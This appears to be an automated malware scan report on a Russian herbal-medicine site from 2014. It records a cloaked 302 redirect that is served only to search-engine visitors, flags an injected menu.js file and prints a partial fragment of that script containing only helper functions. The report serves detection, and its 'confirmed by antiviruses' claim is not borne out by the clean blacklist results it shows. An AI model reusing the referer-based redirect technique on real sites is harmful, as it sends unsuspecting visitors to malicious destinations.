Malicious/Suspicious Redirects

Request | Server response | Status |
--- | --- | --- |
http://www.med-herbal.ru/ (imitation of visitor from search engine) | HTTP/1.1 302 Found, Location: http://site.portrelay.com/ | malicious |

Request sent (search-engine referer imitated):

```http
GET / HTTP/1.1
Host: www.med-herbal.ru
Referer: http://www.google.com/search?q=redirect+check1
```

Server response:

```http
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 22:14:22 GMT
Pragma: no-cache
Location: http://site.portrelay.com/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=lispaoqkicd15jia2dmg17hoi0; path=/
X-Powered-By: PHP/5.3.3-7+squeeze8
```
Scanned pages/files

Request | Server response | Status |
--- | --- | --- |
http://www.med-herbal.ru/ | 200 OK, Content-Length: 27687, Content-Type: text/html | clean |
http://www.med-herbal.ru/engine/ajax/menu.js | 200 OK, Content-Length: 4349, Content-Type: application/x-javascript | malicious (see below) |
http://www.med-herbal.ru/engine/ajax/dle_ajax.js | 200 OK, Content-Length: 6148, Content-Type: application/x-javascript | clean |
http://www.med-herbal.ru/engine/ajax/js_edit.js | 200 OK, Content-Length: 8271, Content-Type: application/x-javascript | clean |
http://adversni.com/b1xa/6d8/094/ | 200 OK, Content-Length: 8226, Content-Type: application/javascript | clean |
http://www.med-herbal.ru/7-dikorastushhie-rasteniya.html | 200 OK, Content-Length: 17583, Content-Type: text/html | clean |
http://masudel.com/50bb20bb/98a/8/46e/39b08 | 200 OK, Content-Length: 8226, Content-Type: application/javascript | clean |
http://www.med-herbal.ru/dikie_rasteniya/ | 200 OK, Content-Length: 16249, Content-Type: text/html | clean |
http://www.med-herbal.ru/user/admin/ | 200 OK, Content-Length: 15670, Content-Type: text/html | clean |
http://www.med-herbal.ru/user/admin/news/ | 200 OK, Content-Length: 28920, Content-Type: text/html | clean |
http://www.med-herbal.ru/10-air-otvar-iz-aira-najstoka-iz-aira-nastoj-aira.html | 200 OK, Content-Length: 18210, Content-Type: text/html | clean |
http://www.med-herbal.ru/lekarstvennye_rasteniya/ | 200 OK, Content-Length: 25233, Content-Type: text/html | clean |
http://www.med-herbal.ru/6-sbor-pererabotka-i-xranenie-lekarstvennyx-rastenij.html | 200 OK, Content-Length: 22569, Content-Type: text/html | clean |
http://www.med-herbal.ru/index.php?do=register | 200 OK, Content-Length: 14449, Content-Type: text/html | clean |
http://www.med-herbal.ru/lekarstvennye_rasteniya | 200 OK, Content-Length: 25233, Content-Type: text/html | clean |

Malicious code in http://www.med-herbal.ru/engine/ajax/menu.js - confirmed by antiviruses (see below). The fragment captured by the scanner breaks off after the second helper function; closing braces have been added so the fragment parses:

```javascript
(function () {
    // Case-insensitive indexOf; returns the position of the needle, or false if absent
    function stripos(f_haystack, f_needle, f_offset) {
        var haystack = (f_haystack + '').toLowerCase();
        var needle = (f_needle + '').toLowerCase();
        var index = 0;
        if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
            return index;
        }
        return false;
    }
    // Sets a site-wide cookie that expires after `expires` seconds
    function setCookie(name, value, expires) {
        var date = new Date(new Date().getTime() + expires * 1000);
        document.cookie = name + '=' + value + '; path=/; expires=' + date.toUTCString();
    }
    // The rest of the injected script is not reproduced in the report
})();
```

Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=med-herbal.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://med-herbal.ru/
Result: med-herbal.ru is not infected or malware details are not published yet.